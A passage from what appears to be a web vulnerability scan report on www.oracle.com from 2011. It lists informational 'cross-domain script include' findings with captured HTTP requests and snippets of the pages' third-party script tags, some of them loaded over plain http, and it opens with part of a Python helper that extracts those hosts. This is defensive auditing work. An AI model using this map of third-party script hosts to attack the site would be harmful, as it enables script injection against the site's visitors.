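def third_party_hosts(page_url, raw_response):
    """Distinct external script hosts for a raw response: the page's script trust set."""
    return sorted({f["host"] for f in cross_domain_scripts(page_url, body_of(raw_response))})


if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_PAGE_URL, body_of(SAMPLE_RESPONSE)):
        flag = "PLAINTEXT" if f["plaintext"] else "https"
        print(f"{f['host']:28} {flag:9} {f['url']}")
```

Each host in the output is a party whose compromise (or whose DNS, or any network between the browser and it, for the http entries) yields script execution in the www.oracle.com origin; that is the whole substance of the "Information"-severity finding repeated for every page in this section.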

20.143. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/laos-316260-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /as/corporate/contact/laos-316260-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41186217791713760,0:1)
Date: Tue, 06 Sep 2011 16:17:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.144. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/maldives-316209-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /as/corporate/contact/maldives-316209-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35764036328879253,0:1)
Date: Tue, 06 Sep 2011 16:17:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.145. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/nepal-316215-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /as/corporate/contact/nepal-316215-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41171065147094656,0:1)
Date: Tue, 06 Sep 2011 16:17:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.146. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /as/corporate/contact/pakistan-316185-en-as.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /as/corporate/contact/pakistan-316185-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41104347125119295,0:1)
Date: Tue, 06 Sep 2011 16:17:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.147. http://www.oracle.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=35807978136234850,0:1)
Content-Length: 138644
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.148. http://www.oracle.com/openworld/connect/face-to-face/welcome-reception/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/connect/face-to-face/welcome-reception/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/connect/face-to-face/welcome-reception/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/other/oracle-university/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343415620; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Fother%2Foracle-university%2Findex.html; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41159318411124786,0:1)
Content-Length: 41716
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:10:16 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.149. http://www.oracle.com/openworld/connect/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/connect/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/connect/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/other/oracle-university/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_cc=true; gpv_p24=no%20value; s_nr=1315343822428; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Fother%2Foracle-university%2Findex.html; s_sq=oracleblogs%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41171155341409016,0:1)
Content-Length: 45092
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:17:03 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.150. http://www.oracle.com/openworld/contact/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/contact/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/contact/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/mobile/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342700612; s_wgw_lv_s=First%20Visit; s_nr6=1315342700613-New; s_nr=1315342700893; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Fmobile%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Fcontact%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=282;ecid=41029782196745490,0:1)
Content-Length: 42391
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:58:21 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.151. http://www.oracle.com/openworld/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; s_cc=true; s_nr=1315342573329; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=130;ecid=41105347851259510,0:1)
Content-Length: 73189
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:56:51 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.152. http://www.oracle.com/openworld/learn/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/learn/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/learn/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342712989; s_wgw_lv_s=First%20Visit; s_nr6=1315342712990-New; s_nr=1315342713019; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35690098465744975,0:1)
Content-Length: 41648
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:58:34 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.153. http://www.oracle.com/openworld/learn/other/general-sessions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/learn/other/general-sessions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/learn/other/general-sessions/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315343371334; s_wgw_lv_s=First%20Visit; s_nr6=1315343371336-New; s_nr=1315343371394; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Fother%252Fgeneral-sessions%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35734164830875811,0:1)
Content-Length: 85660
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:32 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.154. http://www.oracle.com/openworld/learn/other/oracle-university/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/learn/other/oracle-university/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/learn/other/oracle-university/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/learn/other/general-sessions/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315343376138; s_wgw_lv_s=First%20Visit; s_nr6=1315343376139-New; s_nr=1315343376187; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Flearn%2Fother%2Fgeneral-sessions%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Fother%252Fgeneral-sessions%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Flearn%252Fother%252Foracle-university%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35734809075979073,0:1)
Content-Length: 69307
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:41 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.155. http://www.oracle.com/openworld/register/packages/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/register/packages/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/register/packages/index.html?src=7013425&Act=226 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7013425&Act=226&pcode=WWMK10042957MPP055&refer=http%3A//www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=299;ecid=35672222811585456,0:1)
Content-Length: 49483
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:07 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.156. http://www.oracle.com/openworld/tools/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/tools/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/tools/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/contact/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342709171; s_wgw_lv_s=First%20Visit; s_nr6=1315342709172-New; s_nr=1315342709203; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Fcontact%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35689772048225917,0:1)
Content-Length: 41186
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:58:29 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.157. http://www.oracle.com/openworld/tools/mobile/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /openworld/tools/mobile/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openworld/tools/mobile/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/index.html
